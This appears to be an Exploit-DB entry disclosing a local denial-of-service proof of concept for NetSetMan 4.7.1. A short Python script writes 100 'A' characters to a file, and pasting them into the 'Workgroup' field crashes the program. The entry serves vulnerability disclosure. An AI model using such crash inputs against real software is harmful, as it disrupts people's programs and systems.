NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)
Author: Victor Mondragón
type: dos
platform: windows
port:
date_added: 2019-02-19
date_updated: 2019-02-19
verified: 0
codes:
tags: Denial of Service (DoS)
aliases:
screenshot_url:
application_url: http://www.exploit-db.comnetsetman_setup_471.exe
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-17
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: NetSetMan_4.7.1.py
#2.- Open netsetman.txt and copy content to clipboard
#3.- Open NetSetMan
#4.- Enable "Workgroup" and Paste Clipboard
#5.- Click on "Activate"
#6.- Crashed
cod = "\x41" * 100
f = open('netsetman.txt', 'w')
f.write(cod)
f.close()